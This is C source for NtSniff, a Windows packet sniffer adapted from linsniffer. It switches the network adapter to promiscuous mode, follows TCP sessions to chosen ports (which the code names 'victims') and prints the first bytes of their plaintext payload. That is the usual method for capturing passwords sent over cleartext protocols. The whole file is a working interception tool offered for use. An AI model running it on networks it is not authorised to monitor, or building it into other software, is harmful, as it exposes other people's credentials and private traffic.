/*
 *
 *  NtSniff by Davide Libenzi <davidel@maticad.it>
 *  You can use this software as You want, provided that this header
 *  remain untouched.
 *  This sniffer born as a mixture of linsniffer.c, linux header structs and
 *  MicroSoft DDK code.
 *  To build NtSniff You need MicroSoft DDK.
 *  Enjoy.
 *
 */

#define UNICODE 1

#include <windows.h>
#include <windowsx.h>
#include <winsock.h>
#include <tchar.h>
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <time.h>

#include "packet32.h"
#include "ntddndis.h"




#define __LITTLE_ENDIAN_BITFIELD



#define SZERO(s)                memset(&(s), 0, sizeof(s))

#define MAX_PACKET_SIZE         8192

#define ETH_ALEN                6

#define CAPTLEN                 512
#define TIMEOUT                 15
#define MAX_LISTEN_PORTS        64




#pragma pack(push)
#pragma pack(1)


typedef unsigned char __u8;
typedef unsigned short __u16;
typedef unsigned int __u32;
/* INDENT OFF */
typedef struct _ETH_HEADER
{
    unsigned char   h_dest[ETH_ALEN];
    unsigned char   h_source[ETH_ALEN];
    unsigned short  h_proto;
}               ETH_HEADER;
typedef struct _IP_HEADER
{
#if defined(__LITTLE_ENDIAN_BITFIELD)
	__u8	        ihl:4,
		            version:4;
#elif defined (__BIG_ENDIAN_BITFIELD)
	__u8	        version:4,
  		            ihl:4;
#endif
    __u8            tos;
    __u16           tot_len;
    __u16           id;
    __u16           frag_off;
    __u8            ttl;
    __u8            protocol;
    __u16           check;
    __u32           saddr;
    __u32           daddr;
}               IP_HEADER;
typedef struct _TCP_HEADER
{
    __u16           source;
    __u16           dest;
    __u32           seq;
    __u32           ack_seq;
#if defined(__LITTLE_ENDIAN_BITFIELD)
	__u16	        res1:4,
		            doff:4,
		            fin:1,
		            syn:1,
		            rst:1,
		            psh:1,
		            ack:1,
		            urg:1,
		            res2:2;
#elif defined(__BIG_ENDIAN_BITFIELD)
	__u16	        doff:4,
		            res1:4,
		            res2:2,
		            urg:1,
		            ack:1,
		            psh:1,
		            rst:1,
		            syn:1,
		            fin:1;
#endif	
    __u16           window;
    __u16           check;
    __u16           urg_ptr;
}               TCP_HEADER;
/* INDENT ON */

typedef struct _ETHER_PACKET
{
    ETH_HEADER      ETH;
    IP_HEADER       IP;
    TCP_HEADER      TCP;
    BYTE            DataBuffer[1];
}               ETHER_PACKET;


typedef struct _CONTROL_BLOCK
{
    PVOID           hFile;
    HANDLE          hEvent;
    TCHAR           AdapterName[128];
    ULONG           PacketLength;
    ULONG           LastReadSize;
    UINT            BufferSize;
    BYTE            PacketBuffer[MAX_PACKET_SIZE];
}               CONTROL_BLOCK, *PCONTROL_BLOCK;

typedef struct _VICTIM
{
    unsigned long   saddr;
    unsigned long   daddr;
    unsigned short  sport;
    unsigned short  dport;
    int             bytes_read;
    char            active;
    time_t          start_time;
}               VICTIM;


#pragma pack(pop)




static int      IsListenPort(int iPort);
static void     ClearVictim(VICTIM * pVictim);
static int      FilterPacket(IP_HEADER * pIpHdr, TCP_HEADER * pTcpHdr,
                        VICTIM * pVictim);
static void     PrintHeader(IP_HEADER * pIpHdr, TCP_HEADER * pTcpHdr);
static char    *HostLookup(unsigned long int in);
static void     PrintData(int iDataLenght, char *pszData, VICTIM * pVictim);
static void     ShowUsage(void);
static int      ParseCmdLine(int argc, char *argv[]);
static BOOL     CtrlC_Handler(DWORD dwEvent);





static int      iStopSniff = 0;
static int      iTimeout = TIMEOUT,
                iCapLenght = CAPTLEN;
static CONTROL_BLOCK Adapter;
static __u32    spy_addr = 0;
static VICTIM   Victim;
static int      iLsPortsCount = 0;
static int      iLsPorts[MAX_LISTEN_PORTS];






static int      IsListenPort(int iPort)
{

    int             ii;

    if (iLsPortsCount == 0)
        return (1);

    for (ii = 0; ii < iLsPortsCount; ii++)
        if (iLsPorts[ii] == iPort)
            return (1);

    return (0);

}



static void     ClearVictim(VICTIM * pVictim)
{

    SZERO(*pVictim);

}



static int      FilterPacket(IP_HEADER * pIpHdr, TCP_HEADER * pTcpHdr,
                        VICTIM * pVictim)
{

    if (pIpHdr->protocol != 6)
        return (0);

    if (pVictim->active != 0)
        if (pVictim->bytes_read > iCapLenght)
        {
            _tprintf(_T("\n<<< [CAPLEN Exceeded]\n"));
            ClearVictim(pVictim);
            return (0);
        }

    if (pVictim->active != 0)
        if (time(NULL) > (pVictim->start_time + iTimeout))
        {
            _tprintf(_T("\n<<< [Timed Out]\n"));
            ClearVictim(pVictim);
            return (0);
        }

    if ((pVictim->active == 0) && IsListenPort(ntohs(pTcpHdr->dest)) &&
            ((spy_addr == 0) || (pIpHdr->saddr == spy_addr) || (pIpHdr->daddr == spy_addr)))
        if (pTcpHdr->syn == 1)
        {
            pVictim->saddr = pIpHdr->saddr;
            pVictim->daddr = pIpHdr->daddr;
            pVictim->active = 1;
            pVictim->sport = pTcpHdr->source;
            pVictim->dport = pTcpHdr->dest;
            pVictim->bytes_read = 0;
            pVictim->start_time = time(NULL);

            PrintHeader(pIpHdr, pTcpHdr);
        }

    if (pTcpHdr->dest != pVictim->dport)
        return (0);
    if (pTcpHdr->source != pVictim->sport)
        return (0);
    if (pIpHdr->saddr != pVictim->saddr)
        return (0);
    if (pIpHdr->daddr != pVictim->daddr)
        return (0);

    if (pTcpHdr->rst == 1)
    {
        _tprintf(_T("\n<<< [RST]\n"));
        ClearVictim(pVictim);
        return (0);
    }

    if (pTcpHdr->fin == 1)
    {
        _tprintf(_T("\n<<< [FIN]\n"));
        ClearVictim(pVictim);
        return (0);
    }

    return (1);

}




static void     PrintHeader(IP_HEADER * pIpHdr, TCP_HEADER * pTcpHdr)
{

    printf("\n>>> { %s => ", HostLookup(pIpHdr->saddr));

    printf("%s [%d] }\n", HostLookup(pIpHdr->daddr), (int) ntohs(pTcpHdr->dest));

}




static char    *HostLookup(unsigned long int in)
{

    static char     szHostName[512] = "";
    struct in_addr  iaddr;
    struct hostent *he;

    SZERO(iaddr);
    iaddr.s_addr = in;

    he = gethostbyaddr((char *) &iaddr, sizeof(struct in_addr), AF_INET);

    if (he == NULL)
        strcpy(szHostName, inet_ntoa(iaddr));
    else
        strcpy(szHostName, he->h_name);

    return (szHostName);

}




static void     PrintData(int iDataLenght, char *pszData, VICTIM * pVictim)
{

    int             ii,
                    tt = 0;

    pVictim->bytes_read += iDataLenght;

    for (ii = 0; ii < iDataLenght; ii++)
    {
        if (pszData[ii] == 13)
        {
            printf("\n");
            tt = 0;
        }
        else if (isprint(pszData[ii]))
        {
            printf("%c", pszData[ii]);
            tt++;
        }
        if (tt > 78)
        {
            tt = 0;
            printf("\n");
        }
    }

    if (tt > 0)
        printf("\n");

}



static void     ShowUsage(void)
{

    _tprintf(_T("<<< NtSniff 1.0 by Davide Libenzi - davidel@maticad.it >>>\n"
                    "Use: ntsniff [-hctps]\n"
                    "-h    = Show this help\n"
                    "-c i  = Set max bytes capture [ %d ]\n"
                    "-t i  = Set sniff timeout [ %d ]\n"
                    "-s s  = Set sniffer victim\n"
                    "-p i  = Set port to sniff [ -p i1 -p i2 ... ]\n"),
            CAPTLEN, TIMEOUT);

}



static int      ParseCmdLine(int argc, char *argv[])
{

    int             ii;

    for (ii = 1; ii < argc; ii++)
    {
        if (argv[ii][0] != '-')
        {
            ShowUsage();
            return (-1);
        }

        switch (argv[ii][1])
        {
            case ('p'):
                {
                    if ((++ii < argc) && (iLsPortsCount < (MAX_LISTEN_PORTS)))
                    {
                        iLsPorts[iLsPortsCount] = atoi(argv[ii]);

                        ++iLsPortsCount;
                    }
                }
                break;

            case ('s'):
                {
                    if (++ii < argc)
                    {
                        struct hostent *he;

                        he = gethostbyname(argv[ii]);
                        if (he == NULL)
                            spy_addr = inet_addr(argv[ii]);
                        else
                            spy_addr = *(__u32 *) he->h_addr_list[0];
                    }
                }
                break;

            case ('t'):
                {
                    if (++ii < argc)
                        iTimeout = atoi(argv[ii]);
                }
                break;

            case ('c'):
                {
                    if (++ii < argc)
                        iCapLenght = atoi(argv[ii]);
                }
                break;

            case ('h'):
            default:
                ShowUsage();
                return (-1);
        }
    }

    return (0);

}



static BOOL     CtrlC_Handler(DWORD dwEvent)
{

    ++iStopSniff;

    return (TRUE);

}



int __cdecl     main(int argc, char *argv[])
{

    int             iPacketCount = 0,
                    iPacketSniffed = 0;
    WORD            wVersionRequested = MAKEWORD(2, 0);
    ULONG           NameLength = sizeof(Adapter.AdapterName);
    PVOID           pPacket;
    ETHER_PACKET   *pEthPkt = (ETHER_PACKET *) Adapter.PacketBuffer;
    IP_HEADER      *pIpHdr = (IP_HEADER *) ((char *) &pEthPkt->IP);
    TCP_HEADER     *pTcpHdr = (TCP_HEADER *) ((char *) &pEthPkt->TCP);
    BYTE           *pPktData = pEthPkt->DataBuffer;
    WSADATA         wsaData;


    if (WSAStartup(wVersionRequested, &wsaData) != 0)
    {
        _tprintf(_T("Unable to find socket library\n"));
        return (1);
    }

    if (ParseCmdLine(argc, argv) < 0)
    {
        WSACleanup();
        return (1);
    }

    SZERO(Adapter);

    PacketGetAdapterNames(Adapter.AdapterName, &NameLength);

    Adapter.BufferSize = MAX_PACKET_SIZE;

    if ((Adapter.hFile = PacketOpenAdapter(Adapter.AdapterName)) == NULL)
    {
        _tprintf(_T("Unable to open adapter %s\n"), Adapter.AdapterName);
        WSACleanup();
        return (1);
    }

    PacketSetFilter(Adapter.hFile, NDIS_PACKET_TYPE_PROMISCUOUS);


    if ((pPacket = PacketAllocatePacket(Adapter.hFile)) == NULL)
    {
        _tprintf(_T("Unable to allocate packet\n"));
        PacketCloseAdapter(Adapter.hFile);
        WSACleanup();
        return (1);
    }


    SetConsoleCtrlHandler((PHANDLER_ROUTINE) CtrlC_Handler, TRUE);


    while (!iStopSniff)
    {
        PacketInitPacket(pPacket, Adapter.PacketBuffer, Adapter.BufferSize);

        PacketReceivePacket(Adapter.hFile, pPacket, TRUE, &Adapter.PacketLength);

        ++iPacketCount;

        if ((Adapter.PacketLength > (sizeof(ETH_HEADER) + sizeof(IP_HEADER) + sizeof(TCP_HEADER))) &&
                FilterPacket(pIpHdr, pTcpHdr, &Victim))
        {
            ++iPacketSniffed;

            PrintData(ntohs(pIpHdr->tot_len) - sizeof(IP_HEADER) - sizeof(TCP_HEADER),
                    (char *) pPktData, &Victim);
        }
    }

    _tprintf(_T("Received %d packets - %d sniffed\n"), iPacketCount, iPacketSniffed);


    PacketFreePacket(pPacket);

    PacketResetAdapter(Adapter.hFile);

    PacketCloseAdapter(Adapter.hFile);

    WSACleanup();

    return (0);

}
